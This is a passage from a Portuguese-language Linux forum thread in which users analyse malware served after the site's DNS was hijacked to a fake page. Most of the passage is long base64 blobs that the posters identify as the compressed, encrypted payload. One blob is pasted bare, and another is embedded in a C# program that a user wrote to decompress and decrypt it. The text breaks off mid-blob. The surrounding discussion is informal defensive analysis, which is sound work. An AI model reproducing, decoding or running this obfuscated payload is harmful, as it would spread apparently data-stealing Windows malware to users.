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


    A partir daqui é puro achismo, não conheço quase nada do funcionamento interno do Windows.

    O que deduzo é que de alguma forma esse payload vai colocar um script no IE, e essa coisa vai chamar aquela função bonita com argumentos (t,e,r,n,c,a,p) (TERMCAP!), que tem a linda linha catch(u) (peguei você!) HAAHHAHAHAHA. O campo 'b' na primeira função deve ser onde ele armazena os dados roubados... Os números devem ser índices em algum array de dados da MS... Naquele payload deve haver funções para enviar email ou algo do tipo. Depois vou criar uma VM rodando um sniffer na rede dela e executar essa bagaça... por enquanto tô só no vim + bash. Também vou tentar salver o payload64 como .exe e rodar no win pra ver quê que dá...

    EDIT: Usuáios linux, acalmai-vos! A malvadeza era pra Windows! E calma, a culpa não foi do Fábio!

    Enzo Ferber
    []'s


    
$ indent -kr -i8 src.c
    

    
"(...)all right-thinking people know that (a) K&R are _right_ and (b) K&R are right." 
    
        - linux/Documentation/CodingStyle - TORVALDS, Linus.


    4 0
  • Quote

    • 69. Re: VOL sofreu sequestro de DNS e foi apontado para um site FAKE

    Perfil removido
    removido
    (usa Nenhuma)

    Enviado em 25/11/2016 - 10:20h

    Malware que depende do IE e rWindows? acho que o cara invadiu a conta errada, pegou o VOL ao invés do baboo rsrsrs
    --
    Linux Counter: #596371

    2 0
  • Quote

    • 70. Re: VOL sofreu sequestro de DNS e foi apontado para um site FAKE

    Enzo de Brito Ferber
    EnzoFerber
    (usa FreeBSD)

    Enviado em 25/11/2016 - 10:21h

    ru4n escreveu:

    Malware que depende do IE e rWindows? acho que o cara invadiu a conta errada, pegou o VOL ao invés do baboo rsrsrs
    --
    Linux Counter: #596371


    Num é? Pensei a mesma coisa...

    Mas devemos nos lembrar que esse é um sujeito que deixou o ZAP dele no código...

    Enzo Ferber
    []'s


    
$ indent -kr -i8 src.c
    

    
"(...)all right-thinking people know that (a) K&R are _right_ and (b) K&R are right." 
    
        - linux/Documentation/CodingStyle - TORVALDS, Linus.


    1 0
  • Quote

    • 71. Re: VOL sofreu sequestro de DNS e foi apontado para um site FAKE

    ANDRE MILKE DOS SANTOS
    andremilke
    (usa Debian)

    Enviado em 25/11/2016 - 10:32h

    Esta string é um arquivo compactado, fiz um programa em C# e depurei, tratei no outro post https://www.vivaolinux.com.br/topico/Sites-Linux/Site-vivaolinux-solicitando-download-de-arquivo

    Código para descompactar e decriptar

    
using System;
    
using System.Collections.Generic;
    
using System.IO;
    
using System.IO.Compression;
    
using System.Linq;
    
using System.Text;
    
using System.Threading.Tasks;
    

    
namespace ConsoleApplicationFormBase64
    
{
    
    class Program
    
    {
    
        static void Main(string[] args)
    
        {
    
            byte[] file = System.Convert.FromBase64String("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